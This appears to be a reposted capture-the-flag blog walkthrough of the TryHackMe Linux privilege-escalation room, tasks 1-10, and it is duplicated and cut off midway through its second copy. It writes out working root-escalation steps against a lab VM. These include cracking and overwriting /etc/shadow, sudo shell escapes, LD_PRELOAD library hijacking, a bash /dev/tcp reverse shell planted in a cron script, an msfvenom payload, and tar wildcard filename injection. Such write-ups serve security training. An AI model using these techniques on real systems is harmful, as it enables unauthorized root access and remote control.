02-17-2023, 12:55 PM
TryHackMe Linux PrivEsc – Magical Linux Privilege Escalation (1/2)
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1138616","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<h2>CHALLENGE OVERVIEW</h2>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-linux-privesc-magical-linux-privilege-escalation-1-2/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2Fmtw2fk27bsY%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<ul>
<li><strong>CTF Creator: </strong><a href="https://tryhackme.com/p/Tib3rius"><strong>Tib3rius</strong></a></li>
<li><strong>Link: </strong><a href="https://tryhackme.com/room/linuxprivesc">https://tryhackme.com/room/linuxprivesc</a></li>
<li><strong>Difficulty</strong>: medium </li>
<li><strong>Target</strong>: gaining root access using a variety of different techniques</li>
<li><strong>Highlight</strong>: Quickly gaining root access on a Linux computer in many different ways</li>
<li><strong>Tags</strong>: <em>privesc, linux, privilege escalation</em></li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="713" height="472" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-230.png" alt="" class="wp-image-1138655" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-230.png 713w, https://blog.finxter.com/wp-content/uplo...00x199.png 300w" sizes="(max-width: 713px) 100vw, 713px" /></figure>
</div>
<p>Using different exploits to compromise operating systems can feel like magic (when they work!).</p>
<p>In this walkthrough, you will see various “magical” ways that Linux systems can be rooted. These methods rely on the Linux system having misconfigurations that allow various read/write/execute permissions on files that should be better protected. In this post, we will cover tasks 1-10.</p>
<h2>TASK 1 Deploy the Vulnerable Debian VM</h2>
<p>After connecting to our TryHackMe VPN, let’s start our <code>notes.txt</code> file and write down our IPs in an export fashion.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export targetIP=10.10.63.231
export myIP=10.6.2.23</pre>
<p>Now we can go ahead and log in via SSH using the starting credentials given in the instructions:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh [email protected]
id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
</pre>
<p>Now that we are in via SSH, let’s start exploiting this machine!</p>
<h2>TASK 2 Service Exploits</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="534" height="796" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-231.png" alt="" class="wp-image-1138658" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-231.png 534w, https://blog.finxter.com/wp-content/uplo...01x300.png 201w" sizes="(max-width: 534px) 100vw, 534px" /></figure>
</div>
<p>In this task, we will privesc by exploiting MySQL using <a href="https://www.exploit-db.com/exploits/1518" target="_blank" rel="noreferrer noopener">https://www.exploit-db.com/exploits/1518</a></p>
<p>We’ll create a new file named <code>rootbash</code> that spawns a root shell. This box has the exploit preloaded, so all we have to do is cut and paste the commands from this section to try out the <strong>privesc</strong>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="393" height="584" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-217.png" alt="" class="wp-image-1138627" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-217.png 393w, https://blog.finxter.com/wp-content/uplo...02x300.png 202w" sizes="(max-width: 393px) 100vw, 393px" /></figure>
</div>
<h2>Task 3: Weak File Permissions – Readable /etc/shadow</h2>
<p>In this task, we will read <code>/etc/shadow</code> and crack the hash with <strong><em><a href="https://blog.finxter.com/tryhackme-daily-bugle-made-easy-a-helpful-walkthrough-with-hacking-video/" data-type="post" data-id="1106248" target="_blank" rel="noreferrer noopener">John the Ripper</a></em></strong>.</p>
<p>First, we need to save the root entry from <code>/etc/shadow</code> file as <code>hash.txt</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="593" height="115" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-218.png" alt="" class="wp-image-1138629" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-218.png 593w, https://blog.finxter.com/wp-content/uplo...300x58.png 300w" sizes="(max-width: 593px) 100vw, 593px" /></figure>
</div>
<p>Next, let’s load up John and crack the hash with <code>rockyou.txt</code> as our wordlist</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">john --wordlist=</PATH/TO/>rockyou.txt hash.txt</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="372" height="473" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-219.png" alt="" class="wp-image-1138631" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-219.png 372w, https://blog.finxter.com/wp-content/uplo...36x300.png 236w" sizes="(max-width: 372px) 100vw, 372px" /></figure>
</div>
<p>We have found our root password, <code>password123</code>!</p>
<h2>TASK 4: Weak File Permissions – Writeable /etc/shadow</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="716" height="469" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-232.png" alt="" class="wp-image-1138659" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-232.png 716w, https://blog.finxter.com/wp-content/uplo...00x197.png 300w" sizes="(max-width: 716px) 100vw, 716px" /></figure>
</div>
<p>In this task, we will change the root password in <code>/etc/shadow</code> file.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">mkpasswd -m sha-512 newpasswordhere
$6$pz5mE.wYesKIYGN$jyRHWFXauy1tWmXLWABRKFjUplUH4u7w2YvxEysk5OPcS.HcgBoQkYt66gkkuMB6EKK8WUh1CY.BAO2mdOdPb.
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="422" height="588" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-220.png" alt="" class="wp-image-1138638" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-220.png 422w, https://blog.finxter.com/wp-content/uplo...15x300.png 215w" sizes="(max-width: 422px) 100vw, 422px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">user@debian:~/tools/mysql-udf$ nano /etc/shadow
user@debian:~/tools/mysql-udf$ su root
Password: root@debian:/home/user/tools/mysql-udf#
</pre>
<h2>TASK 5 Weak File Permissions – Writeable /etc/passwd</h2>
<p>In this task, we will change the root passwd in <code>/etc/passwd</code>. First we need to generate a new hashed password: </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">openssl passwd newpasswordhere</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="409" height="545" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-221.png" alt="" class="wp-image-1138639" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-221.png 409w, https://blog.finxter.com/wp-content/uplo...25x300.png 225w" sizes="(max-width: 409px) 100vw, 409px" /></figure>
</div>
<h2>TASK 6 Sudo – Shell Escape Sequences</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="534" height="796" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-233.png" alt="" class="wp-image-1138660" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-233.png 534w, https://blog.finxter.com/wp-content/uplo...01x300.png 201w" sizes="(max-width: 534px) 100vw, 534px" /></figure>
</div>
<p>Let’s check our sudo privileges:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo -l</pre>
<p>We can choose any of the many bin files that we have sudo permissions on, except for the apache2 bin that doesn’t have a sudo exploit listed on GTFObins</p>
<p>Today we’ll choose to run the exploit utilizing the more bin file.</p>
<p class="has-base-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f449.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>Link</strong>: <a href="https://gtfobins.github.io/gtfobins/more/" target="_blank" rel="noreferrer noopener">https://gtfobins.github.io/gtfobins/more/</a></p>
<p>Running the following two commands gives us a root shell:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">TERM= sudo more /etc/profile
!/bin/sh
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="420" height="595" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-222.png" alt="" class="wp-image-1138643" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-222.png 420w, https://blog.finxter.com/wp-content/uplo...12x300.png 212w" sizes="(max-width: 420px) 100vw, 420px" /></figure>
</div>
<h2>TASK 7 Sudo – Environment Variables</h2>
<h3>Method 1: preload file spoofing</h3>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /home/user/tools/sudo/preload.c
sudo LD_PRELOAD=/tmp/preload.so more
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="530" height="564" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-223.png" alt="" class="wp-image-1138644" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-223.png 530w, https://blog.finxter.com/wp-content/uplo...82x300.png 282w" sizes="(max-width: 530px) 100vw, 530px" /></figure>
</div>
<h3>Method 2: shared object spoofing</h3>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ldd /usr/sbin/apache2
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
sudo LD_LIBRARY_PATH=/tmp apache2
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="675" height="247" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-224.png" alt="" class="wp-image-1138645" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-224.png 675w, https://blog.finxter.com/wp-content/uplo...00x110.png 300w" sizes="(max-width: 675px) 100vw, 675px" /></figure>
</div>
<h2>TASK 8 Cron Jobs – File Permissions</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="711" height="537" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-234.png" alt="" class="wp-image-1138661" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-234.png 711w, https://blog.finxter.com/wp-content/uplo...00x227.png 300w" sizes="(max-width: 711px) 100vw, 711px" /></figure>
</div>
<p>In this task, we will root the Linux box by changing the file <code>overwrite.sh</code> that is scheduled to run automatically every minute on cron jobs. </p>
<p>Because we have to write file permissions on the file, we can change the contents to spawn a revshell that we can catch on a listener. The file is owned by root, so it will spawn a root shell.</p>
<p>Overwrite the file with the following:</p>
<pre class="wp-block-preformatted"><code>#!/bin/bash
bash -i >& /dev/tcp/10.6.2.23/8888 0>&1</code></pre>
<p>Now, all we need to do is start a <code>netcat</code> listener and wait for a maximum of 1 minute to catch the revshell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 8888</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="807" height="497" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-225.png" alt="" class="wp-image-1138647" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-225.png 807w, https://blog.finxter.com/wp-content/uplo...00x185.png 300w, https://blog.finxter.com/wp-content/uplo...68x473.png 768w" sizes="(max-width: 807px) 100vw, 807px" /></figure>
</div>
<h2>TASK 9 Cron Jobs – PATH Environment Variable</h2>
<p>In this task, we will hijack the <code>PATH</code> environment variable by creating an <code>overwrite.sh</code> file in <code>/home/user</code> directory.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">user@debian:~$ cat overwrite.sh #!/bin/bash
cp /bin/bash /tmp/rootbash
chmod +xs /tmp/rootbash
</pre>
<p>This bash script will copy <code>/bin/bash</code> (the shell) to the <code>tmp</code> directory, then add execute privileges and an <code>suid</code> bit. After the <code>overwrite.sh</code> file runs, we can manually activate the root shell by running the new file “<code>rootbash</code>” with persistence mode.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
rootbash-4.1# exit
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="800" height="895" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-226.png" alt="" class="wp-image-1138648" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-226.png 800w, https://blog.finxter.com/wp-content/uplo...68x300.png 268w, https://blog.finxter.com/wp-content/uplo...68x859.png 768w" sizes="(max-width: 800px) 100vw, 800px" /></figure>
</div>
<h2>TASK 10 Cron Jobs – Wildcards</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="708" height="468" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-235.png" alt="" class="wp-image-1138662" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-235.png 708w, https://blog.finxter.com/wp-content/uplo...00x198.png 300w" sizes="(max-width: 708px) 100vw, 708px" /></figure>
</div>
<p>In this exploit, we will use strange filenames to trick the system into thinking they are checkpoint flags on the tarball command which issue a command to run the elf shell to give us a root shell on our <code>netcat</code> listener. </p>
<p>First, let’s create a new payload for a revshell</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f elf -o shell.elf</pre>
<p>Next, we’ll transfer the elf file to <code>/home/usr</code> on the target via a <a href="https://blog.finxter.com/python-one-liner-webserver/" data-type="post" data-id="8635" target="_blank" rel="noreferrer noopener">simple HTTP server</a>. Finally, we need to create two empty files with the following names:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=shell.elf
</pre>
<p>Finally, we’ll need to start up a <code>netcat</code> listener to catch the root shell.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nc -lnvp 8888</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="765" height="173" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-227.png" alt="" class="wp-image-1138649" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-227.png 765w, https://blog.finxter.com/wp-content/uplo...300x68.png 300w" sizes="(max-width: 765px) 100vw, 765px" /></figure>
</div>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="393" height="481" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-228.png" alt="" class="wp-image-1138650" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-228.png 393w, https://blog.finxter.com/wp-content/uplo...45x300.png 245w" sizes="(max-width: 393px) 100vw, 393px" /></figure>
</div>
<h2>POST-EXPLOITATION</h2>
<p>Let’s remove the shell and the other two spoofed empty command extension files.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">rm /home/user/shell.elf
rm /home/user/--checkpoint=1
rm /home/user/--checkpoint-action=exec=shell.elf
</pre>
<h2>FINAL THOUGHTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="527" height="797" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-236.png" alt="" class="wp-image-1138665" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-236.png 527w, https://blog.finxter.com/wp-content/uplo...98x300.png 198w" sizes="(max-width: 527px) 100vw, 527px" /></figure>
</div>
<p>Magic isn’t actually needed to carry out any of the <code>privesc</code> methods outlined in this post. </p>
<p>As long as the target machine has a misconfiguration on password files (<code>/etc/shadow</code> and/or <code>/etc/passwd</code>), cron jobs are set to run files that we can modify or spoof, or a PATH variable that we can hijack with a spoof file, we can easily escalate privileges to the root user.</p>
<p>Thanks for reading this write-up, and be sure to check out part II for more “magical” privesc methods.</p>
</div>
https://www.sickgaming.net/blog/2023/02/...ation-1-2/
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1138616","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<h2>CHALLENGE OVERVIEW</h2>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-linux-privesc-magical-linux-privilege-escalation-1-2/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2Fmtw2fk27bsY%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<ul>
<li><strong>CTF Creator: </strong><a href="https://tryhackme.com/p/Tib3rius"><strong>Tib3rius</strong></a></li>
<li><strong>Link: </strong><a href="https://tryhackme.com/room/linuxprivesc">https://tryhackme.com/room/linuxprivesc</a></li>
<li><strong>Difficulty</strong>: medium </li>
<li><strong>Target</strong>: gaining root access using a variety of different techniques</li>
<li><strong>Highlight</strong>: Quickly gaining root access on a Linux computer in many different ways</li>
<li><strong>Tags</strong>: <em>privesc, linux, privilege escalation</em></li>
</ul>
<h2>BACKGROUND</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="713" height="472" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-230.png" alt="" class="wp-image-1138655" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-230.png 713w, https://blog.finxter.com/wp-content/uplo...00x199.png 300w" sizes="(max-width: 713px) 100vw, 713px" /></figure>
</div>
<p>Using different exploits to compromise operating systems can feel like magic (when they work!).</p>
<p>In this walkthrough, you will see various “magical” ways that Linux systems can be rooted. These methods rely on the Linux system having misconfigurations that allow various read/write/execute permissions on files that should be better protected. In this post, we will cover tasks 1-10.</p>
<h2>TASK 1 Deploy the Vulnerable Debian VM</h2>
<p>After connecting to our TryHackMe VPN, let’s start our <code>notes.txt</code> file and write down our IPs in an export fashion.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export targetIP=10.10.63.231
export myIP=10.6.2.23</pre>
<p>Now we can go ahead and log in via SSH using the starting credentials given in the instructions:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">ssh [email protected]
id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)
</pre>
<p>Now that we are in via SSH, let’s start exploiting this machine!</p>
<h2>TASK 2 Service Exploits</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="534" height="796" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-231.png" alt="" class="wp-image-1138658" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-231.png 534w, https://blog.finxter.com/wp-content/uplo...01x300.png 201w" sizes="(max-width: 534px) 100vw, 534px" /></figure>
</div>
<p>In this task, we will privesc by exploiting MySQL using <a href="https://www.exploit-db.com/exploits/1518" target="_blank" rel="noreferrer noopener">https://www.exploit-db.com/exploits/1518</a></p>
<p>We’ll create a new file named <code>rootbash</code> that spawns a root shell. This box has the exploit preloaded, so all we have to do is cut and paste the commands from this section to try out the <strong>privesc</strong>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="393" height="584" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-217.png" alt="" class="wp-image-1138627" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-217.png 393w, https://blog.finxter.com/wp-content/uplo...02x300.png 202w" sizes="(max-width: 393px) 100vw, 393px" /></figure>
</div>
<h2>Task 3: Weak File Permissions – Readable /etc/shadow</h2>
<p>In this task, we will read <code>/etc/shadow</code> and crack the hash with <strong><em><a href="https://blog.finxter.com/tryhackme-daily-bugle-made-easy-a-helpful-walkthrough-with-hacking-video/" data-type="post" data-id="1106248" target="_blank" rel="noreferrer noopener">John the Ripper</a></em></strong>.</p>
<p>First, we need to save the root entry from <code>/etc/shadow</code> file as <code>hash.txt</code>.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="593" height="115" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-218.png" alt="" class="wp-image-1138629" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-218.png 593w, https://blog.finxter.com/wp-content/uplo...300x58.png 300w" sizes="(max-width: 593px) 100vw, 593px" /></figure>
</div>
<p>Next, let’s load up John and crack the hash with <code>rockyou.txt</code> as our wordlist</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">john --wordlist=</PATH/TO/>rockyou.txt hash.txt</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="372" height="473" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-219.png" alt="" class="wp-image-1138631" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-219.png 372w, https://blog.finxter.com/wp-content/uplo...36x300.png 236w" sizes="(max-width: 372px) 100vw, 372px" /></figure>
</div>
<p>We have found our root password, <code>password123</code>!</p>
<h2>TASK 4: Weak File Permissions – Writeable /etc/shadow</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="716" height="469" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-232.png" alt="" class="wp-image-1138659" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-232.png 716w, https://blog.finxter.com/wp-content/uplo...00x197.png 300w" sizes="(max-width: 716px) 100vw, 716px" /></figure>
</div>
<p>In this task, we will change the root password in <code>/etc/shadow</code> file.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">mkpasswd -m sha-512 newpasswordhere
$6$pz5mE.wYesKIYGN$jyRHWFXauy1tWmXLWABRKFjUplUH4u7w2YvxEysk5OPcS.HcgBoQkYt66gkkuMB6EKK8WUh1CY.BAO2mdOdPb.
</pre>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="422" height="588" src="https://blog.finxter.com/wp-content/uploads/2023/02/image-220.png" alt="" class="wp-image-1138638" srcset="https://blog.finxter.com/wp-content/uploads/2023/02/image-220.png 422w, https://blog.finxter.com/wp-content/uplo...15x300.png 215w" sizes="(max-width: 422px) 100vw, 422px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">user@debian:~/tools/mysql-udf$ nano /etc/shadow
user@debian:~/tools/mysql-udf$ su root
Password: root@debian:/home/user/tools/mysql-udf#
</pre>
<h2>TASK 5 Weak File Permissions – Writeable /etc/passwd</h2>
<p>In this task, we will change the root passwd in <code>/etc/passwd</code>. First we need to generate a new hashed password: </p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">openssl passwd newpasswordhere</pre>
<div class="wp-block-image">
